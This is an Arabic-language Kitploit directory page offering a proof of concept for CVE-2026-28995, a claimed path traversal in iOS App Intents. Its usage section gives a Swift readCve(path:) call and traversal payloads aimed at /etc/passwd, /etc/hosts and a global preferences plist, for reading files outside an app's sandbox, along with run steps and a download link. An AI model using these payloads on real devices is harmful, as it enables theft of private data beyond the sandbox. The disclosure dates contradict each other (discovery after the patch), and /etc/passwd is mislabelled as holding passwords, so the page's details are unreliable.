Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-28995 — # CVE-2026-28995 إثبات المفهوم لـ CVE-2026-28995 — ثغرة تجاوز المسار في App Intents على iOS 26.4.2 والإصدارات الأقدم | Kitploit
أدوات/GitHubGitHub/robertmak2014-sudow/cve-2026-28995
أمان iOSتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن الجوال
GitHubrobertmak2014-sudow/cve-2026-28995

CVE-2026-28995

# CVE-2026-28995 إثبات المفهوم لـ CVE-2026-28995 — ثغرة تجاوز المسار في App Intents على iOS 26.4.2 والإصدارات الأقدم

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
4214منذ 7 أياملم تتم المراجعة بعد
مشاركة

CVE-2026-28995

إثبات المفهوم لـ CVE-2026-28995 — ثغرة اجتياز المسار في App Intents على iOS 26.4.2 والإصدارات الأقدم.

الوصف

تسمح هذه الثغرة لتطبيق ضار بـ قراءة أي ملف خارج حمايته (sandbox) عبر App Intents. السبب الجذري هو التحقق غير الكافي من المسار في إطار عمل App Intents من Apple.

الإصدارات المتأثرة: iOS 26.4.2 والإصدارات الأقدم
تم التصحيح في: iOS 26.5 (11 مايو 2026)

الاستخدام

1. الدالة readCve(path: String) -> String

let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
  1. أمثلة المسارات
المساريقرأ
../../../../../../../../../../../../../etc/passwdكلمات مرور المستخدمين
../../../../../../../../../../../../../etc/hostsملف hosts
../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plistتفضيلات النظام
  1. التعامل مع الدلائل

إذا كان المسار يشير إلى دليل، فستُرجع الدالة:

[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/

كيفية التشغيل

أنشئ مشروع iOS في Xcode. أضف CVE-2026-28995.swift إلى المشروع. استدعِ readCve(path:) باستخدام المسار المستهدف. شغّل على iOS 26.4.2 أو إصدار أقدم.

الإفصاح المسؤول

تم الاكتشاف: 1 يوليو 2026
تم التصحيح في: iOS 26.5 (11 مايو 2026)

تنزيل الأداة